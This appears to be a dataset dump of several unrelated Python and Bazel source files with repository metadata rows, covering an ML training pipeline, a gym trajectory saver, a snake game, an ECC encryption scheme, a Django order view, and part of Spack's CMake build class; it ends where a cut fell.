# NOTE(review): training_job_dir is assigned but never used in this script.
training_job_dir = artifact_store_path + '/gcaiptrainer/'
training_pipeline = TrainingPipeline(name='GCP Orchestrated')
# Add a datasource. This will automatically track and version it.
ds = CSVDatasource(name='Pima Indians Diabetes',
                   path='gs://zenml_quickstart/diabetes.csv')
training_pipeline.add_datasource(ds)
# Add a split
training_pipeline.add_split(RandomSplit(
    split_map={'train': 0.7, 'eval': 0.3}))
# Add a preprocessing unit
training_pipeline.add_preprocesser(
    StandardPreprocesser(
        features=['times_pregnant', 'pgc', 'dbp', 'tst', 'insulin', 'bmi',
                  'pedigree', 'age'],
        labels=['has_diabetes'],
        overwrite={'has_diabetes': {
            'transform': [{'method': 'no_transform', 'parameters': {}}]}}
    ))
# Add a trainer
training_pipeline.add_trainer(FeedForwardTrainer(
    loss='binary_crossentropy',
    last_activation='sigmoid',
    output_units=1,
    metrics=['accuracy'],
    epochs=20))
# Add an evaluator
training_pipeline.add_evaluator(
    TFMAEvaluator(slices=[['has_diabetes']],
                  metrics={'has_diabetes': ['binary_crossentropy',
                                            'binary_accuracy']}))
# Run the pipeline locally but distribute the beam-compatible steps, i.e.,
# the Data, Statistics, Preprocessing and Evaluator Steps.
# Note: If any of these steps are non-standard, custom steps, then you need
# to build a new Docker image based on the ZenML Dataflow image, and pass that
# into the `image` parameter in the ProcessingDataFlowBackend
# Define the processing backend
processing_backend = ProcessingDataFlowBackend(project=project)
# Define the metadata store
metadata_store = MySQLMetadataStore(
    host='127.0.0.1',
    port=3306,
    database=mysql_db,
    username=mysql_user,
    password=mysql_pw,
)
# Define the artifact store
artifact_store = ArtifactStore(artifact_store_path)
# Run the pipeline
training_pipeline.run(
    backends=[processing_backend],
    metadata_store=metadata_store,
    artifact_store=artifact_store,
)
| 35.352941 | 78 | 0.746423 |
acdf9f93c41e3baa16e7f1e7066f90733cf6e00e | 125 | py | Python | src/wrappers/__init__.py | ondrejpudis/crop-yield-predictor | 061514bf51eca5b2abe0ae8e48e1f63478186890 | [
"MIT"
] | 7 | 2019-06-25T16:54:08.000Z | 2021-12-22T08:12:08.000Z | src/wrappers/__init__.py | ondrejpudis/crop-yield-predictor | 061514bf51eca5b2abe0ae8e48e1f63478186890 | [
"MIT"
] | null | null | null | src/wrappers/__init__.py | ondrejpudis/crop-yield-predictor | 061514bf51eca5b2abe0ae8e48e1f63478186890 | [
"MIT"
] | 3 | 2021-07-10T15:17:30.000Z | 2021-11-22T01:24:19.000Z | from .clusterer_wrapper import ClustererWrapper
from .crop_yield_dataset import CropYieldDataset, PredictionCropYieldDataset
| 41.666667 | 76 | 0.904 |
acdf9fe911a0422d6c9a187024e3bc7a3acdb095 | 3,123 | py | Python | expert/save_traj_ppo.py | hyyh28/SAIL | 125ad3e64eefcf532931f567b95a5320737851e9 | [
"MIT"
] | 16 | 2020-04-29T03:25:41.000Z | 2022-03-22T02:19:38.000Z | expert/save_traj_ppo.py | hyyh28/SAIL | 125ad3e64eefcf532931f567b95a5320737851e9 | [
"MIT"
] | null | null | null | expert/save_traj_ppo.py | hyyh28/SAIL | 125ad3e64eefcf532931f567b95a5320737851e9 | [
"MIT"
] | 4 | 2020-04-29T03:22:53.000Z | 2021-12-01T02:40:16.000Z | import argparse
import gym
import os
import sys
import pickle
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from itertools import count
from utils import *
# Command-line configuration for trajectory collection.
parser = argparse.ArgumentParser(description='Save expert trajectory')
parser.add_argument('--env-name', default="Hopper-v2", metavar='G',
                    help='name of the environment to run')
parser.add_argument('--model-path', metavar='G',
                    help='name of the expert model')
parser.add_argument('--render', action='store_true', default=False,
                    help='render the environment')
parser.add_argument('--seed', type=int, default=1, metavar='N',
                    help='random seed (default: 1)')
parser.add_argument('--max-expert-state-num', type=int, default=50000, metavar='N',
                    help='maximal number of main iterations (default: 50000)')
parser.add_argument('--running-state', type=int, default=0)
args = parser.parse_args()

dtype = torch.float32
torch.set_default_dtype(dtype)

# Seed both the environment and torch for reproducible rollouts.
env = gym.make(args.env_name)
env.seed(args.seed)
torch.manual_seed(args.seed)
is_disc_action = len(env.action_space.shape) == 0
state_dim = env.observation_space.shape[0]

# SECURITY: pickle.load executes arbitrary code — only load trusted model
# files. A context manager closes the handle (the original leaked it).
with open(args.model_path, "rb") as model_file:
    if args.running_state == 1:
        print('use running state')
        policy_net, _, running_state = pickle.load(model_file)
    else:
        print('no running state')
        policy_net, _ = pickle.load(model_file)

expert_trajs = []
policy_net.to(dtype)
def main_loop():
    """Roll out the expert policy and collect (state, action) trajectories.

    Episodes are appended to the module-level ``expert_trajs`` list; collection
    stops once ``args.max_expert_state_num`` environment steps are reached.
    """
    num_steps = 0
    for i_episode in count():
        expert_traj = []
        state = env.reset()
        if args.running_state:
            state = running_state(state)
        reward_episode = 0
        # Cap each episode at 10000 steps.
        for t in range(10000):
            state_var = tensor(state).unsqueeze(0).to(dtype)
            # choose mean action
            action = policy_net(state_var)[0][0].detach().numpy()
            # choose stochastic action
            # action = policy_net.select_action(state_var)[0].cpu().numpy()
            action = int(action) if is_disc_action else action.astype(np.float64)
            next_state, reward, done, _ = env.step(action)
            if args.running_state:
                next_state = running_state(next_state)
            reward_episode += reward
            num_steps += 1
            expert_traj.append(np.hstack([state, action]))
            if args.render:
                env.render()
            # Trajectories are only saved when the episode terminates; an
            # episode truncated at 10000 steps without ``done`` is discarded.
            if done:
                expert_traj = np.stack(expert_traj)
                expert_trajs.append(expert_traj)
                break
            state = next_state
        print('Episode {}\t reward: {:.2f}'.format(i_episode, reward_episode))
        if num_steps >= args.max_expert_state_num:
            break
main_loop()

# Persist the collected trajectories; include the running-state normalizer
# when it was used. A context manager closes the file (the original passed a
# bare open() to pickle.dump and never closed the handle), and the duplicated
# path expression is computed once.
traj_path = os.path.join(assets_dir(),
                         'expert_traj/{}_expert_traj.p'.format(args.env_name))
payload = (expert_trajs, running_state) if args.running_state else expert_trajs
with open(traj_path, 'wb') as traj_file:
    pickle.dump(payload, traj_file)
acdfa18ac99bd4b48f1061eaf5cc36ce96e098c0 | 214 | py | Python | backend/everpro/everpro/__init__.py | Ascensiony/EverPro-Intelligence-APIs | 41de67418a7ed266547840948301225220ddd6c9 | [
"Apache-2.0"
] | 1 | 2020-12-24T21:39:26.000Z | 2020-12-24T21:39:26.000Z | backend/everpro/everpro/__init__.py | Ascensiony/EverPro-Intelligence-APIs | 41de67418a7ed266547840948301225220ddd6c9 | [
"Apache-2.0"
] | null | null | null | backend/everpro/everpro/__init__.py | Ascensiony/EverPro-Intelligence-APIs | 41de67418a7ed266547840948301225220ddd6c9 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
__all__ = ("celery_app",)
| 26.75 | 54 | 0.785047 |
acdfa1c4a66e2310ae4437918196139c1c89a230 | 4,540 | py | Python | Python/snake.py | osbaldomartinez20/snake | 8f232626cd1714304996c76dc4f0e461b2c5f0ca | [
"MIT"
] | null | null | null | Python/snake.py | osbaldomartinez20/snake | 8f232626cd1714304996c76dc4f0e461b2c5f0ca | [
"MIT"
] | null | null | null | Python/snake.py | osbaldomartinez20/snake | 8f232626cd1714304996c76dc4f0e461b2c5f0ca | [
"MIT"
] | null | null | null | ##libraries used for the game
import random
import msvcrt
import time
##global variables
height = 0
width = 0
snakeBody = [(0,0)]
##directions, to go up you need to subtract
DIR = (0,0)
UP = (-1,0)
DOWN = (1,0)
RIGHT = (0, 1)
LEFT = (0,-1)
##the apple's location
location = (0,0)
##this is for displaying the objects in the game
EMPTY = 0
HEAD = 1
BODY = 2
APPLE = 3
DISPLAY_CHAR = {
EMPTY: " ",
HEAD: "X",
BODY: "0",
APPLE: "*",
}
##Used to compare with user input
INPUT_CHAR_UP = "W"
INPUT_CHAR_DOWN = "S"
INPUT_CHAR_LEFT = "A"
INPUT_CHAR_RIGHT = "D"
##function that initializes the game. Takes two parameters h and w, which represent height and width of game space.
def initGame(h, w) :
    global height
    global width
    global UP
    height = h
    width = w
    # Snake starts moving upward.
    initSnake(UP)
##initializes the snake with a list of coordinates body and a direction dire
def initSnake(dire) :
    global DIR
    DIR = dire
##makes snake take a step
def takeStep(position) :
    global snakeBody
    # Snapshot the body so segments can shift toward the head in place.
    temp = snakeBody[:]
    for y in range(len(snakeBody)) :
        if y == len(snakeBody)-1 :
            # Head (last element) advances one step; modulo wraps the board.
            snakeBody[y] = ((snakeBody[y][0] + position[0]) % height), ((snakeBody[y][1] + position[1]) % width)
        else :
            # Every other segment takes the old place of its successor.
            snakeBody[y] = ((temp[y+1][0])), ((temp[y+1][1]))
##extends the snake's body
def extendBody(position) :
    global snakeBody
    # Appending makes the new cell the head (head() returns the last element).
    snakeBody.append(position)
##accepts a direction argument, and sets the argument as the snake’s direction
def setDirection(dire) :
    global DIR
    DIR = dire
##returns the position of the front of the snake’s body
def head() :
    global snakeBody
    # The head is stored as the last body segment.
    return snakeBody[-1]
##function that initializes the apple location
def initApple(loc) :
    global location
    location = loc
##function that gives apple location
def appleLocation() :
    # Rejection-sample random cells until one is not occupied by the snake.
    while True:
        apple_loc = (random.randint(0, height-1), random.randint(0, width-1))
        if apple_loc not in snakeBody:
            break
    initApple(apple_loc)
##calculates the next move for the snake
def next_position(position, step):
    # Modulo wraps movement around the board edges.
    return (
        (position[0] + step[0]) % height,
        (position[1] + step[1]) % width
    )
##function creates the board for the game
def gameBoard() :
    g_board = [[DISPLAY_CHAR[EMPTY] for _ in range(width)] for _ in range(height)]
    #used to store snake's body in board
    for y in range(len(snakeBody)) :
        g_board[snakeBody[y][0]][snakeBody[y][1]] = DISPLAY_CHAR[BODY]
    #used to store snake's head in board
    # Drawn after the body so the head glyph overwrites the body glyph.
    h = head()
    g_board[h[0]][h[1]] = DISPLAY_CHAR[HEAD]
    ##used to store apple in board
    g_board[location[0]][location[1]] = DISPLAY_CHAR[APPLE]
    return g_board
##renders the current board state to stdout, framed by an ASCII border
def gameRender():
    board = gameBoard()
    border = "+" + "-" * width + "+"
    print(border)
    # Each board row is a list of single-character cells; join them once
    # per row instead of concatenating character by character.
    for row in board:
        print("|" + "".join(row) + "|")
    print(border)
##function that allows the user to play the game
def play_game() :
    appleLocation()
    gameRender()
    while True :
        #wait third of a second
        time.sleep(0.3)
        ##this handles user input and assigns the new direction to the snake
        u_in = kbfunc()
        user_input = ""
        if u_in != False :
            user_input = u_in.decode().upper()
        # Reversing directly into yourself is disallowed (e.g. UP while DOWN).
        if user_input == INPUT_CHAR_UP and DIR != DOWN :
            setDirection(UP)
        elif user_input == INPUT_CHAR_DOWN and DIR != UP :
            setDirection(DOWN)
        elif user_input == INPUT_CHAR_RIGHT and DIR != LEFT :
            setDirection(RIGHT)
        elif user_input == INPUT_CHAR_LEFT and DIR != RIGHT :
            setDirection(LEFT)
        #checks whether snake crashed into itself
        new_position = next_position(head(),DIR)
        if new_position in snakeBody :
            print("You died!")
            break
        ##checks whether the snake ate the apple
        # Eating extends the body at the new head cell and respawns the apple.
        if new_position == location :
            extendBody(new_position)
            appleLocation()
        takeStep(DIR)
        gameRender()
##function to listen to key press
# NOTE: msvcrt is a Windows-only stdlib module; this game will not run on
# other platforms without replacing this function.
def kbfunc():
    #this is boolean for whether the keyboard has been hit
    x = msvcrt.kbhit()
    if x:
        #getch acquires the character encoded in binary ASCII
        ret = msvcrt.getch()
    else:
        ret = False
    return ret
# Entry point: a 10x20 board, then the interactive game loop.
if __name__== "__main__":
    initGame(10, 20)
    play_game()
| 24.808743 | 115 | 0.618282 |
acdfa3987df389709687a04f5c180f55954cf14e | 671 | py | Python | scripts/pairwise_NW_alignment.py | glaunay/nox-analysis | 02ea77520e1f6a851973509f854c9c92c82137a6 | [
"Apache-2.0"
] | null | null | null | scripts/pairwise_NW_alignment.py | glaunay/nox-analysis | 02ea77520e1f6a851973509f854c9c92c82137a6 | [
"Apache-2.0"
] | null | null | null | scripts/pairwise_NW_alignment.py | glaunay/nox-analysis | 02ea77520e1f6a851973509f854c9c92c82137a6 | [
"Apache-2.0"
] | null | null | null | import sys, os
import pickle
import pyproteins.sequence.peptide as pep
import pyproteins.alignment.nw_custom as N
import pyproteins.alignment.scoringFunctions as scoringFunctions
try:
inp=sys.argv[1] #it's a pickled list of peptide pairs
except IndexError:
raise Exception("Give input")
try:
output=sys.argv[2]
except IndexError:
raise Exception("Give output")
list_pairs=pickle.load(open(inp,'rb'))
blosum = scoringFunctions.Needle().fScore
nw = N.nw(gapOpen=-10, gapExtend=-0.5, matchScorer=blosum)
results=[]
for pair in list_pairs:
aliResObj=nw.align(pair[0],pair[1])
results.append(aliResObj)
pickle.dump(results,open(output,"wb")) | 24.851852 | 64 | 0.748137 |
acdfa4b0db105734fccdaf180cd4e48cc89fcf4d | 4,062 | py | Python | elite/scheme.py | origamizyt/Elite | 5d279dd82f4a95541c475b0b0ac80995812b652a | [
"MIT"
] | null | null | null | elite/scheme.py | origamizyt/Elite | 5d279dd82f4a95541c475b0b0ac80995812b652a | [
"MIT"
] | null | null | null | elite/scheme.py | origamizyt/Elite | 5d279dd82f4a95541c475b0b0ac80995812b652a | [
"MIT"
] | null | null | null | '''
This module provides top-level encryption scheme that is already fully
integrated, ready for use. You can also define your own encryption schemes.
Predefined ones include secp256k1 with AES_EAX and secp384r1 with AES_GCM.
'''
from ecdsa.keys import BadSignatureError
from elite import EliteError
from .cipher import *
from .secret import *
from .utils import *
__all__ = ['getscheme', 'ECCScheme', 'P256k1AesEaxScheme', 'P384r1AesGcmScheme']
class EliteSchemeError(EliteError):
    'General base class for scheme errors.'


class MissingRemoteKey(EliteSchemeError):
    'Raised when an operation needs the remote key but none was imported.'
class ECCScheme:
    '''
    Represents an ECC encryption scheme: an elliptic-curve key pair plus a
    symmetric crypto provider, combined ECIES-style.

    A fresh key pair is generated on construction. The peer's public key
    must be imported (importBinaryKey/importHexKey) before calling
    encrypt, verify or secret, otherwise MissingRemoteKey is raised.
    '''
    def __init__(self, kind: CurveKind, provider: CryptoProvider):
        'Initializes a new instance with a freshly generated private key and a crypto provider.'
        self._kind = kind
        self._privateKey = generate(kind)
        self._publicKey = self._privateKey.publicKey()
        # Peer key; stays None until one of the import* methods is called.
        self._remoteKey = None
        self._provider = provider
    def _check(self) -> None:
        'Raises MissingRemoteKey if the remote key has not been imported.'
        if self._remoteKey is None:
            raise MissingRemoteKey
    def exportBinaryKey(self) -> bytes:
        'Exports the binary version of the public key.'
        return self._publicKey.export().binary
    def exportHexKey(self) -> str:
        'Exports the hex version of the public key.'
        return self._publicKey.export().hexadecimal
    # Annotation fixed: the import* methods store the key and return None
    # (they were previously annotated as returning bytes/str).
    def importBinaryKey(self, key: bytes) -> None:
        'Imports the binary version of the remote key.'
        self._remoteKey = PublicKey.fromBinary(key, self._kind)
    def importHexKey(self, key: str) -> None:
        'Imports the hex version of the remote key.'
        self._remoteKey = PublicKey.fromHex(key, self._kind)
    @property
    def privateKey(self) -> PrivateKey:
        'Gets the private key.'
        return self._privateKey
    @property
    def publicKey(self) -> PublicKey:
        'Gets the public key.'
        return self._publicKey
    @property
    def remoteKey(self) -> PublicKey:
        'Gets the remote key (None until one has been imported).'
        return self._remoteKey
    def sign(self, data: bytes) -> bytes:
        'Signs the data with the local private key.'
        return self._privateKey._key.sign(data)
    def verify(self, data: bytes, signature: bytes) -> bool:
        'Verifies the signature of the data against the remote public key.'
        self._check()
        try:
            self._remoteKey._key.verify(signature, data)
            return True
        except BadSignatureError:
            return False
    def encrypt(self, data: bytes) -> bytes:
        '''
        Encrypts the specific data with the remote key (ECIES).

        An ephemeral key pair is generated, a shared secret is derived
        between it and the remote key, and a symmetric key is derived from
        that secret. Output layout: ephemeral public key || salt || ciphertext.
        '''
        self._check()
        ephemeral = generate(self._kind)
        ephemeral_pub = ephemeral.publicKey()
        secret = shared_secret(self._kind, ephemeral, self._remoteKey)
        key, salt = derive_key(secret)
        data = self._provider.encrypt(key, data)
        return ephemeral_pub.export().binary + salt + data
    def decrypt(self, data: bytes) -> bytes:
        'Decrypts data produced by encrypt, using the local private key.'
        # Split off the ephemeral public key and the KDF salt, then rebuild
        # the same symmetric key the sender derived.
        ephemeral, salt, data = split_data(data, public_key_size(self._kind), get_salt_size())
        ephemeral = PublicKey.fromBinary(ephemeral, self._kind)
        secret = shared_secret(self._kind, self._privateKey, ephemeral)
        key = derive_key(secret, salt)[0]
        data = self._provider.decrypt(key, data)
        return data
    def secret(self) -> bytes:
        'Gets the shared secret established with the remote key.'
        self._check()
        return shared_secret(self._kind, self._privateKey, self._remoteKey)
class P256k1AesEaxScheme(ECCScheme):
    'Curve secp256k1 paired with AES in EAX mode.'
    def __init__(self):
        'Initializes a new instance.'
        super().__init__(CurveKind.CK_SECP256K1, AesEaxCryptoProvider())
class P384r1AesGcmScheme(ECCScheme):
    'Curve secp384r1 paired with AES in GCM mode.'
    def __init__(self):
        'Initializes a new instance.'
        super().__init__(CurveKind.CK_SECP384R1, AesGcmCryptoProvider())
def getscheme() -> ECCScheme:
    'Gets the default scheme (secp256k1 with AES-EAX).'
    return P256k1AesEaxScheme()
| 38.320755 | 94 | 0.673067 |
acdfa5d5a1e939606d690f3f09f15785a6c7bdaf | 4,783 | py | Python | shop/views/order.py | 2000-ion/TIDPP-Lab3 | 3fc97e6214b6e51f40df39f1692d4deec4bb0cc2 | [
"BSD-3-Clause"
] | 2,160 | 2016-01-24T05:08:59.000Z | 2022-03-31T12:15:30.000Z | shop/views/order.py | 2000-ion/TIDPP-Lab3 | 3fc97e6214b6e51f40df39f1692d4deec4bb0cc2 | [
"BSD-3-Clause"
] | 455 | 2016-01-29T22:41:33.000Z | 2022-03-23T08:28:01.000Z | shop/views/order.py | 2000-ion/TIDPP-Lab3 | 3fc97e6214b6e51f40df39f1692d4deec4bb0cc2 | [
"BSD-3-Clause"
] | 818 | 2016-02-01T15:09:07.000Z | 2022-03-28T19:52:26.000Z | from django.utils import timezone
from django.views.decorators.cache import never_cache
from django.utils.translation import gettext_lazy as _
from rest_framework import generics, mixins
from rest_framework.exceptions import NotFound, MethodNotAllowed
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.exceptions import PermissionDenied
from rest_framework.permissions import BasePermission
from shop.rest.money import JSONRenderer
from shop.rest.renderers import CMSPageRenderer
from shop.serializers.order import OrderListSerializer, OrderDetailSerializer
from shop.models.order import OrderModel
class OrderPagination(LimitOffsetPagination):
    # Orders per page when the client does not pass an explicit ``limit``.
    default_limit = 15
    # Template used to render the paginator widget in HTML responses.
    template = 'shop/templatetags/paginator.html'
class OrderPermission(BasePermission):
    """
    Allow access to a given Order if the user is entitled to.
    """
    def has_permission(self, request, view):
        # Only the list view is restricted here; detail views are checked
        # per object in has_object_permission.
        if not view.many:
            return True
        if not request.customer.is_visitor:
            return True
        # Anonymous visitors may never browse the order list.
        raise PermissionDenied(detail=_("Only signed in customers can view their list of orders."))

    def has_object_permission(self, request, view, order):
        if request.user.is_authenticated:
            # Signed-in users may only access their own orders.
            return order.customer.pk == request.user.pk
        # Otherwise access is granted only through the order's secret token.
        supplied_secret = view.kwargs.get('secret')
        if order.secret and order.secret == supplied_secret:
            return True
        raise PermissionDenied(detail=_("This order does not belong to you."))
class OrderView(mixins.ListModelMixin, mixins.RetrieveModelMixin, mixins.UpdateModelMixin,
                generics.GenericAPIView):
    """
    Base View class to render the fulfilled orders for the current user.

    With ``many = True`` the view behaves as the order *list* view; with
    ``many = False`` it behaves as the order *detail* view.
    """
    renderer_classes = [CMSPageRenderer, JSONRenderer, BrowsableAPIRenderer]
    list_serializer_class = OrderListSerializer
    detail_serializer_class = OrderDetailSerializer
    pagination_class = OrderPagination
    permission_classes = [OrderPermission]
    lookup_field = lookup_url_kwarg = 'slug'
    # True -> list view, False -> detail view.
    many = True
    # Window during which the newest order still counts as "the last order"
    # (see is_last), e.g. to render a thank-you variant of the detail page.
    last_order_lapse = timezone.timedelta(minutes=15)

    def get_queryset(self):
        # Non-visitors only ever see their own orders, newest first.
        # Visitors get the unfiltered queryset here; OrderPermission denies
        # them the list view, and detail access is gated by the order secret.
        queryset = OrderModel.objects.all()
        if not self.request.customer.is_visitor:
            queryset = queryset.filter(customer=self.request.customer).order_by('-updated_at')
        return queryset

    def get_serializer_class(self):
        # List and detail views serialize orders differently.
        if self.many:
            return self.list_serializer_class
        return self.detail_serializer_class

    def get_renderer_context(self):
        renderer_context = super().get_renderer_context()
        if self.request.accepted_renderer.format == 'html':
            renderer_context.update(many=self.many)
            if not self.many:
                # add an extra ance to the breadcrumb to show the order number
                renderer_context.update(
                    is_last_order=self.is_last(),
                    extra_ance=self.get_object().get_number(),
                )
        return renderer_context

    def is_last(self):
        """
        Returns ``True`` if the given order is considered as the last order
        for its customer.
        This information may be used to distinguish between a "thank you" and
        a normal detail view.
        """
        assert self.many is False, "This method can be called for detail views only"
        lapse = timezone.now() - self.last_order_lapse
        current_order = self.get_object()
        last_order = self.get_queryset().first()
        # Last order == newest order for the customer, created recently.
        return current_order.id == last_order.id and current_order.created_at > lapse

    @property
    def allowed_methods(self):
        """Restrict method "POST" only on the detail view"""
        allowed_methods = self._allowed_methods()
        if self.many:
            allowed_methods.remove('POST')
        return allowed_methods

    @never_cache
    def get(self, request, *args, **kwargs):
        if self.many:
            return self.list(request, *args, **kwargs)
        return self.retrieve(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        # On the detail view a POST updates the order, then re-renders it.
        if self.many:
            raise MethodNotAllowed("Method POST is not allowed on Order List View")
        self.update(request, *args, **kwargs)
        return self.retrieve(request, *args, **kwargs)

    def list(self, request, *args, **kwargs):
        try:
            return super().list(request, *args, **kwargs)
        except OrderModel.DoesNotExist:
            raise NotFound("No orders have been found for the current user.")

    def retrieve(self, request, *args, **kwargs):
        try:
            return super().retrieve(request, *args, **kwargs)
        except OrderModel.DoesNotExist:
            raise NotFound("No order has been found for the current user.")
| 40.193277 | 99 | 0.687017 |
acdfa614cf7017e1903bd5216b641d281b420129 | 3,319 | bzl | Python | crate_universe/private/srcs.bzl | ttiurani/rules_rust | 2fa92e5a139c7cb64d606718273e295ce756f0f3 | [
"Apache-2.0"
] | 1 | 2017-06-12T02:10:48.000Z | 2017-06-12T02:10:48.000Z | crate_universe/private/srcs.bzl | ttiurani/rules_rust | 2fa92e5a139c7cb64d606718273e295ce756f0f3 | [
"Apache-2.0"
] | null | null | null | crate_universe/private/srcs.bzl | ttiurani/rules_rust | 2fa92e5a139c7cb64d606718273e295ce756f0f3 | [
"Apache-2.0"
] | null | null | null | """A generate file containing all source files used to produce `cargo-bazel`"""
# Each source file is tracked as a target so the `cargo_bootstrap_repository`
# rule will know to automatically rebuild if any of the sources changed.
CARGO_BAZEL_SRCS = [
"@rules_rust//crate_universe:src/cli.rs",
"@rules_rust//crate_universe:src/cli/generate.rs",
"@rules_rust//crate_universe:src/cli/query.rs",
"@rules_rust//crate_universe:src/cli/splice.rs",
"@rules_rust//crate_universe:src/cli/vendor.rs",
"@rules_rust//crate_universe:src/config.rs",
"@rules_rust//crate_universe:src/context.rs",
"@rules_rust//crate_universe:src/context/crate_context.rs",
"@rules_rust//crate_universe:src/context/platforms.rs",
"@rules_rust//crate_universe:src/lib.rs",
"@rules_rust//crate_universe:src/lockfile.rs",
"@rules_rust//crate_universe:src/main.rs",
"@rules_rust//crate_universe:src/metadata.rs",
"@rules_rust//crate_universe:src/metadata/dependency.rs",
"@rules_rust//crate_universe:src/metadata/metadata_annotation.rs",
"@rules_rust//crate_universe:src/rendering.rs",
"@rules_rust//crate_universe:src/rendering/template_engine.rs",
"@rules_rust//crate_universe:src/rendering/templates/crate_build_file.j2",
"@rules_rust//crate_universe:src/rendering/templates/module_build_file.j2",
"@rules_rust//crate_universe:src/rendering/templates/module_bzl.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/aliases.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/binary.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/build_script.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/common_attrs.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/deps.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/library.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/proc_macro.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/header.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/aliases_map.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/deps_map.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/repo_git.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/repo_http.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/starlark/glob.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/starlark/selectable_dict.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/starlark/selectable_list.j2",
"@rules_rust//crate_universe:src/rendering/templates/vendor_module.j2",
"@rules_rust//crate_universe:src/splicing.rs",
"@rules_rust//crate_universe:src/splicing/cargo_config.rs",
"@rules_rust//crate_universe:src/splicing/splicer.rs",
"@rules_rust//crate_universe:src/test.rs",
"@rules_rust//crate_universe:src/utils.rs",
"@rules_rust//crate_universe:src/utils/starlark.rs",
"@rules_rust//crate_universe:src/utils/starlark/glob.rs",
"@rules_rust//crate_universe:src/utils/starlark/label.rs",
"@rules_rust//crate_universe:src/utils/starlark/select.rs",
]
| 63.826923 | 95 | 0.767099 |
acdfa66ea2e5a43ba5d96f4be88d32af27ce5f82 | 9,851 | py | Python | lib/spack/spack/build_systems/cmake.py | nkianggiss/spack | 3477d3375142a30f5714bb5966a6d8bb22c33c06 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2018-08-20T06:55:11.000Z | 2018-08-20T06:55:11.000Z | lib/spack/spack/build_systems/cmake.py | nkianggiss/spack | 3477d3375142a30f5714bb5966a6d8bb22c33c06 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-04-29T22:36:27.000Z | 2019-04-30T12:51:38.000Z | lib/spack/spack/build_systems/cmake.py | nkianggiss/spack | 3477d3375142a30f5714bb5966a6d8bb22c33c06 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-03-12T19:27:17.000Z | 2020-03-12T19:27:17.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import inspect
import os
import platform
import spack.build_environment
from llnl.util.filesystem import working_dir
from spack.util.environment import filter_system_paths
from spack.directives import depends_on, variant
from spack.package import PackageBase, InstallError, run_after
class CMakePackage(PackageBase):
    """Specialized class for packages built using CMake

    For more information on the CMake build system, see:
    https://cmake.org/cmake/help/latest/

    This class provides three phases that can be overridden:

        1. :py:meth:`~.CMakePackage.cmake`
        2. :py:meth:`~.CMakePackage.build`
        3. :py:meth:`~.CMakePackage.install`

    They all have sensible defaults and for many packages the only thing
    necessary will be to override :py:meth:`~.CMakePackage.cmake_args`.
    For a finer tuning you may also override:

        +-----------------------------------------------+--------------------+
        | **Method**                                    | **Purpose**        |
        +===============================================+====================+
        | :py:meth:`~.CMakePackage.root_cmakelists_dir` | Location of the    |
        |                                               | root CMakeLists.txt|
        +-----------------------------------------------+--------------------+
        | :py:meth:`~.CMakePackage.build_directory`     | Directory where to |
        |                                               | build the package  |
        +-----------------------------------------------+--------------------+
    """

    #: Phases of a CMake package
    phases = ['cmake', 'build', 'install']

    #: This attribute is used in UI queries that need to know the build
    #: system base class
    build_system_class = 'CMakePackage'

    #: Targets passed to the generator during the build phase (empty means
    #: the generator's default target).
    build_targets = []
    #: Targets passed to the generator during the install phase.
    install_targets = ['install']

    #: Callbacks invoked after the build phase when build-time tests run.
    build_time_test_callbacks = ['check']

    #: The build system generator to use.
    #:
    #: See ``cmake --help`` for a list of valid generators.
    #: Currently, "Unix Makefiles" and "Ninja" are the only generators
    #: that Spack supports. Defaults to "Unix Makefiles".
    #:
    #: See https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html
    #: for more information.
    generator = 'Unix Makefiles'

    # https://cmake.org/cmake/help/latest/variable/CMAKE_BUILD_TYPE.html
    variant('build_type', default='RelWithDebInfo',
            description='CMake build type',
            values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))

    # CMake itself is only needed while building.
    depends_on('cmake', type='build')

    @property
    def archive_files(self):
        """Files to archive for packages based on CMake"""
        return [os.path.join(self.build_directory, 'CMakeCache.txt')]

    @property
    def root_cmakelists_dir(self):
        """The relative path to the directory containing CMakeLists.txt

        This path is relative to the root of the extracted tarball,
        not to the ``build_directory``. Defaults to the current directory.

        :return: directory containing CMakeLists.txt
        """
        return self.stage.source_path

    @property
    def std_cmake_args(self):
        """Standard cmake arguments provided as a property for
        convenience of package writers

        :return: standard cmake arguments
        """
        # standard CMake arguments
        std_cmake_args = CMakePackage._std_args(self)
        # cmake_flag_args only exists after flags_to_build_system_args ran.
        std_cmake_args += getattr(self, 'cmake_flag_args', [])
        return std_cmake_args

    @staticmethod
    def _std_args(pkg):
        """Computes the standard cmake arguments for a generic package"""
        try:
            generator = pkg.generator
        except AttributeError:
            generator = 'Unix Makefiles'

        # Make sure a valid generator was chosen
        valid_generators = ['Unix Makefiles', 'Ninja']
        if generator not in valid_generators:
            msg = "Invalid CMake generator: '{0}'\n".format(generator)
            msg += "CMakePackage currently supports the following "
            msg += "generators: '{0}'".format("', '".join(valid_generators))
            raise InstallError(msg)

        try:
            build_type = pkg.spec.variants['build_type'].value
        except KeyError:
